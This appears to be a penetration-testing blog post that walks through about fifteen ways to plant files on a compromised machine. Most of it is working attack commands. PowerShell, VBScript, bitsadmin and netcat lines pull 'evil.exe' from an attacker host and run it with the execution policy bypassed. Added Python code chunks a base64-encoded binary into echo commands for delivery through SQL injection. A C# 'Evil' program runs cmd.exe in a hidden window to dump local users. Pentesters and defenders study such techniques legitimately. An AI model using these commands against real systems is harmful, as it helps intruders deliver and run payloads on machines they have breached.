Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and for system admins who just want to move files.
There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will be covered in this blog.
- Powershell file download
- Visual Basic file download
- Perl file download
- Python file download
- Ruby file download
- PHP file download
- FTP file download
- TFTP file download
- Bitsadmin file download
- Wget file download
- Netcat file download
- Windows share file download
- Notepad dialog box file download
- Exe to Text, Text to EXE with PowerShell and Nishang
- Csc.exe to compile from source file.
Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file.
PowerShell File Download
PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows: it has shipped with every Windows release since Windows 7 and Server 2008 R2, and was available as an optional download for Server 2003 and XP before that. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet:
$p = New-Object System.Net.WebClient
# %homepath% is a cmd.exe variable; inside PowerShell use $env:HOMEPATH instead
$p.DownloadFile("http://domain/file", "C:$env:HOMEPATH\file")
To execute this script, save it as test.ps1 and run the following command in a PowerShell window:
PS C:\> .\test.ps1
Or, we can echo it to the file.
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://192.168.10.5/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url, $file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Sometimes, the PowerShell execution policy is set to Restricted. In this case, you will not be able to run scripts through PowerShell… unless you just set it to Unrestricted using the following command:
C:\> powershell Set-ExecutionPolicy Unrestricted
Changing the machine-wide policy requires local administrator rights; as a normal user, add -Scope CurrentUser, or simply keep passing -ExecutionPolicy Bypass on each invocation as in the wget.ps1 example above. The execution policy is a safety feature for administrators, not a security boundary, so it never stops an attacker for long.
Visual Basic File Download
VBScript, run through the Windows Script Host, has come standard on Windows machines since Windows 98. The following script can download a file of your choosing. However, the script is considerably longer than the PowerShell one. The ^" sequences are cmd.exe escapes so that literal double quotes land in the .vbs file:
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > download.vbs
Cscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above.
To execute this script, run the following command in a command shell:
C:\> cscript download.vbs http://demo/evil.exe evil.exe
Perl File Download
#!/usr/bin/perl
use LWP::Simple;   # not part of core Perl; check with: perl -MLWP::Simple -e 1
# getstore() fetches the URL and writes the body to the local path,
# returning the HTTP status code (200 on success)
getstore("http://domain/file", "file");
Python File Download
#!/usr/bin/python
try:
    from urllib.request import urlopen   # Python 3
except ImportError:
    from urllib2 import urlopen          # Python 2 (older hosts)
u = urlopen('http://domain/file')
localFile = open('local_file', 'wb')     # binary mode, so executables are not corrupted on Windows
localFile.write(u.read())
localFile.close()
Ruby File Download
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") do |http|
  r = http.get("/file")
  File.open("save_location", "wb") { |file| file.write(r.body) }
end
PHP File Download
<?php
// file_get_contents() returns the whole body as one string;
// file() returns an array of lines, and writing only $data[0] would truncate the download
$data = @file_get_contents("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'wb');
fwrite($fh, $data);
fclose($fh);
?>
FTP File Download
The ftp client is interactive; the session looks like this (one command per line, switch to binary mode before fetching an executable):
ftp 127.0.0.1
username
password
binary
get file
exit
On Windows, echo these lines into a text file and run ftp -s:commands.txt to drive the client non-interactively, which is what you need when commands are executed through SQL injection.
TFTP File Download
The Windows client takes the remote file first and the local destination second; -i selects binary (octet) mode:
tftp -i host GET file_on_tftp_server C:\%homepath%\file
Note that the TFTP client is an optional feature that is not installed by default on Windows Vista and later, so check for C:\Windows\System32\tftp.exe before relying on it.
Bitsadmin File Download
bitsadmin /transfer n http://domain/file c:\%homepath%\file
The job name (n here) is arbitrary, and the local destination must be a full path. Bitsadmin is deprecated in favor of the BITS PowerShell cmdlets but is still present on current Windows builds.
Wget File Download
wget http://example.com/file
Netcat File Download
On your machine (the sender), listen and stream the file; some netcat builds need -p before the port (nc -l -p 1234):
cat file | nc -l 1234
On the compromised box (the receiver), connect and redirect everything received to disk; the transfer ends when the sender closes the connection:
nc host_ip 1234 > file
Netcat adds no framing or integrity check, so compare a hash (md5sum, sha256sum) on both ends before executing what arrived.
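The two netcat commands above are a raw TCP stream with no protocol on top: the sender writes bytes and closes, the receiver reads until EOF. The following Python script, added here as an illustration and not part of the original post, implements both sides of that exchange so the behaviour can be checked offline on localhost. The payload is a constructed byte string standing in for the file; the hostnames, port and function names are the example's own.

```python
import hashlib
import socket
import threading

# Constructed sample payload standing in for "file" (not a real binary).
SAMPLE_FILE = b"MZ" + bytes(range(256)) * 40


def serve_file(data: bytes, host: str = "127.0.0.1", port: int = 0):
    """Sender side: the equivalent of `cat file | nc -l 1234`.

    Listens once, streams `data` to the first client, then closes.
    Returns (bound_port, thread); port 0 lets the OS pick a free port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def _run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(data)             # no framing: just the raw bytes...
            conn.shutdown(socket.SHUT_WR)  # ...and EOF marks the end of the file
        srv.close()

    t = threading.Thread(target=_run, daemon=True)
    t.start()
    return bound_port, t


def fetch_file(host: str, port: int, chunk: int = 4096) -> bytes:
    """Receiver side: the equivalent of `nc host_ip 1234 > file`.

    Reads until the peer closes the connection, exactly like shell
    redirection of nc's stdout into a file.
    """
    buf = bytearray()
    with socket.create_connection((host, port), timeout=10) as s:
        while True:
            piece = s.recv(chunk)
            if not piece:          # empty read == EOF from the sender
                break
            buf.extend(piece)
    return bytes(buf)


def sha256(data: bytes) -> str:
    """Hex digest used to confirm the bytes survived the transfer intact."""
    return hashlib.sha256(data).hexdigest()


def transfer_demo(data: bytes = SAMPLE_FILE):
    """Run sender and receiver in-process; returns (received_bytes, hashes_match)."""
    port, t = serve_file(data)
    received = fetch_file("127.0.0.1", port)
    t.join(timeout=10)
    return received, sha256(data) == sha256(received)


if __name__ == "__main__":
    got, ok = transfer_demo()
    print(len(got), "bytes received, integrity", "OK" if ok else "FAILED")
```

The hash comparison at the end is the step the bare nc commands lack: a dropped connection leaves a truncated file that nc reports no error about, so always verify before running what you received.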
Windows Share File Download
Map the share to a drive letter, then copy the file across like any local file:
net use x: \\127.0.0.1\share myPassword /user:example.com\userID
copy x:\file C:\%homepath%\file
Remember that SMB (TCP 445) is commonly blocked outbound from corporate networks, so this usually works only between hosts on the same internal network.
Notepad Dialog Box File Download
- Open Notepad
- Go to File - Open
- In the File Name box near the bottom, type in the full URL of your file (for example http://192.168.10.5/evil.txt); the common Open dialog fetches it over HTTP and opens it
- Go to File - Save As to write the content to the local disk
Exe to Txt, and Txt to Exe with PowerShell and Nishang
Nishang ships two helper scripts: ExetoText.ps1 converts a binary to a text file you can move with any of the text-only methods above (including echo through SQL injection), and TexttoExe.ps1 rebuilds the binary on the target.
PS > .\ExetoText.ps1 evil.exe evil.txt
PS > .\TexttoExe.ps1 evil.txt evil.exe
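To make the exe-to-text idea concrete, and to show how it combines with the echo-to-a-file advice in the note at the top of this post, here is an added Python example (my own illustration, not Nishang's code): it base64-encodes a binary, splits the text into cmd.exe echo commands that rebuild it on the target, and decodes it again. The sample bytes are constructed, and the remote path and function names are assumptions for the example.

```python
import base64

# Constructed stand-in for evil.exe: a fake PE header plus filler bytes.
# (Not a real binary; any bytes would do for the round trip.)
SAMPLE_EXE = b"MZ\x90\x00" + bytes(range(256)) * 8


def exe_to_text(data: bytes) -> str:
    """Encode arbitrary bytes as printable base64 text (the ExetoText step)."""
    return base64.b64encode(data).decode("ascii")


def text_to_exe(text: str) -> bytes:
    """Reverse of exe_to_text (the TexttoExe step); any line breaks added in
    transit are dropped before decoding."""
    return base64.b64decode("".join(text.split()))


def echo_commands(text: str, remote_path: str, chunk: int = 1000) -> list:
    """Split the text into cmd.exe echo commands that rebuild it on the target,
    e.g. through xp_cmdshell or another command-injection channel.

    The first command truncates (>) and the rest append (>>). The redirection
    is placed before `echo` so no trailing space is written and a chunk that
    happens to end in a digit is never misread as a handle redirect (`2>`).
    Base64 contains no cmd.exe metacharacters, so nothing needs escaping, and
    1000 chars per line stays far below cmd's ~8191-character limit.
    """
    chunks = [text[i:i + chunk] for i in range(0, len(text), chunk)]
    return [
        f"{'>' if n == 0 else '>>'}{remote_path} echo {c}"
        for n, c in enumerate(chunks)
    ]


def replay_echo_commands(cmds: list) -> str:
    """Simulate what the target's cmd.exe writes: each echo appends the chunk
    plus CRLF. Used here only to check the round trip offline."""
    out = ""
    for cmd in cmds:
        if cmd.startswith(">") and not cmd.startswith(">>"):
            out = ""                       # '>' truncates the file first
        out += cmd.split(" echo ", 1)[1] + "\r\n"
    return out


def roundtrip(data: bytes, remote_path: str = r"C:\Temp\evil.txt") -> bool:
    """Encode, emit echo commands, replay them, decode: True if bytes match."""
    cmds = echo_commands(exe_to_text(data), remote_path)
    return text_to_exe(replay_echo_commands(cmds)) == data


if __name__ == "__main__":
    for line in echo_commands(exe_to_text(SAMPLE_EXE), r"C:\Temp\evil.txt")[:2]:
        print(line[:60] + "...")
    print("round trip OK:", roundtrip(SAMPLE_EXE))
```

On the target, the text file can be turned back into a binary either with Nishang's TexttoExe.ps1 or with plain .NET from PowerShell: [IO.File]::WriteAllBytes("C:\Temp\evil.exe", [Convert]::FromBase64String((Get-Content C:\Temp\evil.txt) -join "")). Since every chunk travels as a separate command, check the rebuilt file's size or hash against the original before running it; a single lost chunk silently corrupts the result.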
Csc.exe to Compile Source from a File
C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity.
The default location for this executable is the following:
C:\Windows\Microsoft.NET\Framework\version
where version is the installed framework folder, for example C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe. It is present on any box with the .NET Framework installed, whether or not Visual Studio is.
Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:\Temp directory. This could obviously be modified to interact with different exe's on the box, or completely re-written to use your own exploit code.
public class Evil {
    public static void Main() {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
        // Hidden window so nothing flashes on an interactive desktop
        startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        startInfo.FileName = "cmd.exe";
        // /C runs the command and exits; output is redirected to C:\Temp (create it first)
        startInfo.Arguments = @"/C net user > C:\Temp\users.txt";
        process.StartInfo = startInfo;
        process.Start();
    }
}
To compile your source code, type (adjusting the framework version folder to what is installed):
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs
C:\evil\evil.exe